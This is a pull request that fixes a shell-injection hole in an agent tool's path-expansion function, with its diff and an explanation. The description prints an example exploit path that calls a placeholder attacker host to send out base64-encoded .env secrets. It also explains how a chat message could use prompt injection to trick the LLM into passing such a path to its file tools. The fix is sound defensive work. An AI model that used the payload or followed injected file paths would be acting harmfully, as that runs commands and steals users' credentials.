### PR TITLE
fix(security): prevent shell injection in _expand_path via ~user path suffix

### DIFF
--- a/tools/file_operations.py
+++ b/tools/file_operations.py
@@ -433,9 +433,13 @@ class ShellFileOperations(FileOperations):
                 slash_idx = rest.find('/')
                 username = rest[:slash_idx] if slash_idx >= 0 else rest
                 if username and re.fullmatch(r'[a-zA-Z0-9._-]+', username):
-                    expand_result = self._exec(f"echo {path}")
+                    # Only expand ~username (not the full path) to avoid shell
+                    # injection via path suffixes like "~user/$(malicious)".
+                    expand_result = self._exec(f"echo ~{username}")
                     if expand_result.exit_code == 0 and expand_result.stdout.strip():
-                        return expand_result.stdout.strip()
+                        user_home = expand_result.stdout.strip()
+                        suffix = path[1 + len(username):]  # e.g. "/rest/of/path"
+                        return user_home + suffix
         
         return path
     


### PR DESCRIPTION
## What

`_expand_path()` in `tools/file_operations.py` passed the full unquoted path to `echo` via the shell when handling `~username/...` format paths. This allowed command substitution in the path suffix to execute arbitrary shell commands.

**Vulnerable code:**
```python
expand_result = self._exec(f"echo {path}")
```

**Example exploit** — a path like `~validuser/$(curl attacker.com/exfil?data=$(cat ~/.env | base64))` would:
1. Pass the username validation (`validuser` matches `[a-zA-Z0-9._-]+`)
2. Execute the shell command inside `$()` when `echo` expands the path

This is exploitable via prompt injection in gateway mode (Telegram/Discord/WhatsApp), where an attacker sends a message that tricks the LLM into calling `read_file` or `write_file` with a malicious path.

## Fix

Only expand `~username` (the validated portion) via the shell, then concatenate the suffix as a plain Python string.

```python
expand_result = self._exec(f"echo ~{username}")
if expand_result.exit_code == 0 and expand_result.stdout.strip():
    user_home = expand_result.stdout.strip()
    suffix = path[1 + len(username):]
    return user_home + suffix
```

## How to test

```python
ops._expand_path("~validuser/$(id)")
# Before: executes id command in shell
# After: returns /home/validuser/$(id) as plain string
```

## Platforms tested

- macOS